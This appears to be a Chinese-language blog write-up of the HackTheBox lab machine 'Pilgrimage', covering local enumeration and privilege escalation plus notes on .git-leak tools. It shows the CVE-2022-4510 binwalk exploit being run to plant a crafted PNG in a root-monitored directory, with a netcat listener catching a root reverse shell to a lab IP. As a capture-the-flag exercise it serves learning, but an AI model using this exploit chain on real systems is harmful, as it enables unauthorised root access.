49 -rw-r----- 1 root  emily   33 Jul  8 15:50 user.txt
emily@pilgrimage:~$ cat user.txt

提权

登录成功，查看 sudo -l

1
2
3

emily@pilgrimage:~/.local/share/nano$ sudo -l
[sudo] password for emily:
Sorry, user emily may not run sudo on pilgrimage.

查看定时任务

emily@pilgrimage:~$ cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# Example of job definition:
# .---------------- minute (0 - 59)
# |  .------------- hour (0 - 23)
# |  |  .---------- day of month (1 - 31)
# |  |  |  .------- month (1 - 12) OR jan,feb,mar,apr ...
# |  |  |  |  .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# |  |  |  |  |
# *  *  *  *  * user-name command to be executed
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#

查看可写文件夹

emily@pilgrimage:~/.local/share/nano$ find / -type d -writable 2>/dev/null
/proc/2716/task/2716/fd
/proc/2716/fd
/proc/2716/map_files
/run/user/1000
/run/user/1000/gnupg
/run/user/1000/systemd
/run/user/1000/systemd/units
/run/user/1000/systemd/inaccessible
/run/lock
/var/www/pilgrimage.htb/shrunk
/var/www/pilgrimage.htb/tmp
/var/lib/php/sessions
/var/tmp
/home/emily
/home/emily/.local
/home/emily/.local/share
/home/emily/.local/share/nano
/home/emily/.config
/home/emily/.config/binwalk
/home/emily/.config/binwalk/plugins
/home/emily/.config/binwalk/modules
/home/emily/.config/binwalk/config
/home/emily/.config/binwalk/magic
/dev/mqueue
/dev/shm
/sys/fs/cgroup/user.slice/user-1000.slice/user@1000.service
/sys/fs/cgroup/user.slice/user-1000.slice/user@1000.service/app.slice
/sys/fs/cgroup/user.slice/user-1000.slice/user@1000.service/init.scope
/tmp
/tmp/.ICE-unix
/tmp/.X11-unix
/tmp/.font-unix
/tmp/.Test-unix
/tmp/.XIM-unix

查看.config 文件，没有收获。看一看进程信息，发现有个 sh 脚本在跑，而且是 root 用户属主

emily@pilgrimage:~$ ps aux
USER         PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
root         746  0.0  0.0   6816  2352 ?        S    15:50   0:00 /bin/bash /usr/sbin/malwarescan.sh
emily@pilgrimage:~$ ls -liah /usr/sbin/malwarescan.sh
31049 -rwxr--r-- 1 root root 474 Jun  1 19:14 /usr/sbin/malwarescan.sh
emily@pilgrimage:~$ cat /usr/sbin/malwarescan.sh
#!/bin/bash

blacklist=("Executable script" "Microsoft executable")

/usr/bin/inotifywait -m -e create /var/www/pilgrimage.htb/shrunk/ | while read FILE; do
        filename="/var/www/pilgrimage.htb/shrunk/$(/usr/bin/echo "$FILE" | /usr/bin/tail -n 1 | /usr/bin/sed -n -e 's/^.*CREATE //p')"
        binout="$(/usr/local/bin/binwalk -e "$filename")"
        for banned in "${blacklist[@]}"; do
                if [[ "$binout" == *"$banned"* ]]; then
                        /usr/bin/rm "$filename"
                        break
                fi
        done
done

用 chatgpt 解释一下这个文件内容

# 创建一个名为 blacklist 的数组，包含两个字符串元素
blacklist=("Executable script" "Microsoft executable")

# 使用 inotifywait 监听 /var/www/pilgrimage.htb/shrunk/ 目录内的新文件，并使用 while 循环逐行读取文件
/usr/bin/inotifywait -m -e create /var/www/pilgrimage.htb/shrunk/ | while read FILE; do

		# 构建完整的文件路径，从 FILE 变量中提取最后一行，并去除开头的 "CREATE " 字符串，拼接成文件路径
        filename="/var/www/pilgrimage.htb/shrunk/$(/usr/bin/echo "$FILE" | /usr/bin/tail -n 1 | /usr/bin/sed -n -e 's/^.*CREATE //p')"
        
        # 使用 binwalk 工具对指定的文件进行解析，将输出保存到 binout 变量
        binout="$(/usr/local/bin/binwalk -e "$filename")"
        
        # 遍历 blacklist 数组中的元素
        for banned in "${blacklist[@]}"; do
        
		        # 如果 binout 变量的内容包含 blacklist 数组中的元素
                if [[ "$binout" == *"$banned"* ]]; then
                
		                # 使用 rm 命令删除对应的文件 break
                        /usr/bin/rm "$filename"
                        break
                fi
        done
done

binwalk 命令执行漏洞+root 脚本调用

既然使用了 binwalk 来对文件进行操作了，那就看一看 binwalk 是否存在漏洞，进而实现 root 执行的 sh 脚本调用 binwalk 反弹 shell 或提权

┌──(i3eg1nner㉿minilite)-[~/Downloads/Pilgrimage]
└─$ searchsploit binwalk
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
 Exploit Title                                                                                                                                                                                        |  Path
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Binwalk v2.3.2 - Remote Command Execution (RCE)                                                                                                                                                       | python/remote/51249.py
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Shellcodes: No Results
Papers: No Results

有个代码执行的漏洞，看一看

with open("binwalk_exploit.png", "wb") as f:
    f.write(data)
    f.write(header_pfs)
    f.write(content)

print("")    
print("You can now rename and share binwalk_exploit and start your local netcat listener.")

脚本的最后似乎是将反弹 shell 写入了 png 文件里，这正好符合我们的需求

emily@pilgrimage:/tmp$ python3 51249.py vjp.png 10.10.14.145 443

################################################
------------------CVE-2022-4510----------------
################################################
--------Binwalk Remote Command Execution--------
------Binwalk 2.1.2b through 2.3.2 included-----
------------------------------------------------
################################################
----------Exploit by: Etienne Lacoche-----------
---------Contact Twitter: @electr0sm0g----------
------------------Discovered by:----------------
---------Q. Kaiser, ONEKEY Research Lab---------
---------Exploit tested on debian 11------------
################################################


You can now rename and share binwalk_exploit and start your local netcat listener.

emily@pilgrimage:/tmp$ ls
51249.py  binwalk_exploit.png  systemd-private-e23853b016894d04af52d9c886a7a73b-systemd-logind.service-NPxI5h  systemd-private-e23853b016894d04af52d9c886a7a73b-systemd-timesyncd.service-2Jbd5e  vjp.png  vmware-root_609-3988556153

文件夹下多了一个 binwalk_exploit.png，本机提前开启监听，将其复制到脚本持续扫描的目录中

1	`emily@pilgrimage:/tmp$ cp binwalk_exploit.png /var/www/pilgrimage.htb/shrunk/`

反弹 shell 成功

┌──(i3eg1nner㉿minilite)-[/usr/share/wordlists]
└─$ sudo nc -lvnp 443
listening on [any] 443 ...
connect to [10.10.14.145] from (UNKNOWN) [10.10.11.219] 49676
cd /root
ls
quarantine
reset.sh
root.txt
cat root.txt

id
uid=0(root) gid=0(root) groups=0(root)
whoami
root
uname -a
Linux pilgrimage 5.10.0-23-amd64 #1 SMP Debian 5.10.179-1 (2023-05-12) x86_64 GNU/Linux
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
    link/ether 00:50:56:b9:e8:f2 brd ff:ff:ff:ff:ff:ff
    altname enp3s0
    altname ens160
    inet 10.10.11.219/23 brd 10.10.11.255 scope global eth0
       valid_lft forever preferred_lft forever

总结复盘

这台靶机攻击路径给的很好，并没有直接简单粗暴地使用漏洞脚本去 getshell，而是把场景藏在了 .git 泄露中，并且把 Web 提供服务的程序放入了其中，从程序判断出任意文件读取，再加上通过泄露的 login.php 文件中提到了连接的数据库文件，自然而然地梳理出读取数据库文件的思路，提权的场景也做得比较用心，把提权思路藏在了正在运行的进程中。总得来说，是一台很锻炼渗透思路和搜索排查能力的靶机，很值得打一打。

知识补充

HTB 靶机更新频繁，可以从中学习到许多新的知识，过去打完靶机关于总结复盘和知识补充可能草草了之，对靶机并没有吃透，所以新增加了总结复盘和知识补充这两个部分，希望自己可以学得更加深入。

.git 泄露

.git 泄露有两种情景，一种是启用了目录索引，另一种是禁止了目录索引。对于这两种情况，也需要使用不同的工具进行操作

工具

WangYihang/GitHacker：🕷️一个“.git”文件夹利用工具，能够恢复整个Git存储库，包括存储，公共分支，公共标签。 (github.com)

lijiejie/GitHack: A .git folder disclosure exploit (github.com)

internetwache/GitTools: A repository with 3 tools for pwn’ing websites with .git repositories available (github.com)

从结果上看，GitHacker 能够获得更加完善的信息，但感觉动静应该也不小，按需取用吧

将 git 文件夹下载下来后，我们需要可用切换到其目录下，尝试使用以下命令来获取信息：

# 查看日志
git log

# 查看提交的区别
git diff + CommitId

# 查看最近的更改
git status

# 恢复上次提交的历史状态
git checkout -- . or git restore .

knowledge_database > hackthebox

Pilgrimage 靶机

https://i3eg1nner.github.io/2023/07/e8652c909b79.html

作者

I3eg1nner

发布于

2023年7月8日

许可协议

DC-2 靶机上一篇

LazySysAdmin_1 靶机下一篇